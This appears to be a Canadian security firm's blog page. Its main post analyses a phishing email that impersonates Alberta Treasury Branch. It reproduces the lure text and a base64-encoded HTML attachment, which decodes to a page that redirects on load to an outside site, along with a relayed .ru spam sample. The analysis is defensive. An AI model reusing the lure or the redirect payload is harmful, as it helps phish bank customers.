Email Header Analyzer for security Using 0Day attack

I was looking at some of the spam mail that have been coming into a client server, but was still getting through some of standard spam filtering engine they have in place. As this is a 0Day phishing attack  http://en.wikipedia.org/wiki/Phishing

And I thought I would Blog about this tool as a security tool/solution.

First it is important to understand what is an e-mail header: https://support.google.com/mail/answer/29436?hl=en

You see e-mail headers are used usually by servers and e-mail clients.
From a security aspect, we like to use : http://mxtoolbox.com/Public/Tools/EmailHeaders.aspx as it provides a quick way to check against known blacklisted mail servers.

Below is a screen of an example e-mail:
The great thing is as soon as the report is done, even if you have no idea about security you see the icons in RED as  a quick indicators for BAD as this e-mail  has been using Black listed servers.

But if you look some more, you can find a wealth of information:
for example the sender if from a .nz domain ?  really Alberta Canada and the sender if from New Zealand.

Below is Also the attachment, in Base64 this is to insure someone can't click and infect themselves.

The body of the e-mail:

DEAR, client@canadacyberclient.com
 
DEAR ALBERTA TREASURY BRANCH CUSTOMER,
 
Your most recent monthly statement is ready and is available for download (see attachement). The statement includes all ATB Online transactions and your starting and ending balances.
 
We email you to let you know your account statement is ready. You can view or print a copy of your statement from the same page. kindly download the attached file to view your most recent statement.
 
ATB Online Financial Services
Customer Relations Services
 
--------------------------------------------------
 
As this e-mail is an automated message, do not reply to this email.
 
--------------------------------------------------
 
No virus found in this message.
Checked by AVG - www.avg.com
Version: 2013.0.2018 / Virus Database: 2909/6842 - Release Date...

--Forwarded Message Attachment--

--= Multipart Boundary 0731140401
Content-Type: text/html;
 name="ATB_ESTMNT_07302014.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
 filename="ATB_ESTMNT_07302014.html"

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9u
YWwvL0VOIj4NCjxodG1sPg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNv
bnRlbnQ9Im5vLWNhY2hlIj4NCjxtZXRhIG5hbWU9IkdFTkVSQVRPUiIgY29udGVudD0iSUJN
IFdlYlNwaGVyZSBQYWdlIERlc2lnbmVyIFYzLjUuMyBmb3IgV2luZG93cyI+DQo8bWV0YSBo
dHRwLWVxdWl2PSJDb250ZW50LVN0eWxlLVR5cGUiIGNvbnRlbnQ9InRleHQvY3NzIj4NCg0K
PHRpdGxlPlRSSktMPC90aXRsZT4NCg0KPC9oZWFkPg0KDQoNCg0KDQo8Ym9keSBtYXJnaW53
aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIiBib3JkZXJmcmFtZT0iMCIgdG9wbWFyZ2luPSIw
IiBsZWZ0bWFyZ2luPSIwIiBvbkxvYWQ9ImphdmFzY3JpcHQ6d2luZG93LmxvY2F0aW9uLmhy
ZWY9J2h0dHA6Ly9vZGMtY2VudGVyLmNvbS9zaXRlL3dwLWNvbnRlbnQvdXBncmFkZS8nIj4N
CiZuYnNwOw0KPC9ib2R5Pg0KPC9odG1sPg==

--= Multipart Boundary 0731140401--

Security Think Tank: How to build a resilient defence against cyber attacks

Security Think Tank: How to build a resilient defence against cyber attacks

http://www.fbi.gov/news/stories/2014/june/gameover-zeus-botnet-disrupted

http://www.fbi.gov/news/stories/2014/june/gameover-zeus-botnet-disrupted

What is Identity Theft? | Consumer Information

What is Identity Theft? | Consumer Information

Canada Get Cyber Safe Guide for Small and Medium Businesses

Many clients ask how should a small business protect itself. 

The below info is quoted from getcybersafe.gc.ca

If you're like most small or medium businesses in Canada, the Internet is an indispensable tool to succeed in today's digital economy. Getting online allows you to reach new customers and grow your business. And even if you don't have a website — or a Facebook page or Twitter account — you probably depend on the Internet for everyday business operations like banking, payroll or ordering supplies.
However, being online requires being safe and secure. As a small or medium business, it's easy to think that you are too small to warrant the attention of cyber criminals. In fact, cyber criminals are now actively targeting smaller businesses because they believe their computers are vulnerable.

The link

http://www.getcybersafe.gc.ca/cnt/rsrcs/pblctns/smll-bsnss-gd/index-eng.aspx

SPAM via relay on an infected system

 SPAM via relay on an infected system


From: "LovelyPfizer" <66b782096@summitrockwall.com>

To: 66b782096 <66b782096@muttath.com>

Content-Type: multipart/alternative; boundary=----=_NextPart_000_0015_01CF7285.2D507C60



------=_NextPart_000_0015_01CF7285.2D507C60

Content-Type: text/plain; charset=UTF-8



Up to 75% off for every luxury product we offer online!

http://66b782096.medicgsdj.ru/?coupon=9B23519 http://66b782096.medicgsdj.ru/?coupon=9B23519



------=_NextPart_000_0015_01CF7285.2D507C60

Content-Type: text/html; charset=UTF-8



<div dir="ltr"><div>Up to 75% off for every luxury product we offer online!<br></div><a href="http://66b782096.medicgsdj.ru/?coupon=9B23519">http://66b782096.medicgsdj.ru/?coupon=9B23519</a><br></div>



------=_NextPart_000_0015_01CF7285.2D507C60--

.

421-4.7.0 [       4] Our system has detected an unusual rate of

421-4.7.0 unsolicited mail originating from your IP address. To protect our

421-4.7.0 users from spam, mail sent from your IP address has been temporarily

421-4.7.0 rate limited. Please visit

421-4.7.0 http://www.google.com/mail/help/bulk_mail.html to review our Bulk

421 4.7.0 Email Senders Guidelines. uu2si7687567igb.23 - gsmtp

QUIT

Fake voiceMail.zip with malware inside it .. as the extracted file is VoiceMail.scr

www.canadacyber.com is Up and online. also the .ca and .net

So we have the website up, we decided to bring it up online as 90% of our clients are referrals. but the guys wanted something up so, we are now online.

Good read about zues botnet

http://www.theregister.co.uk/2014/07/14/gameover_zeus_botnet_back/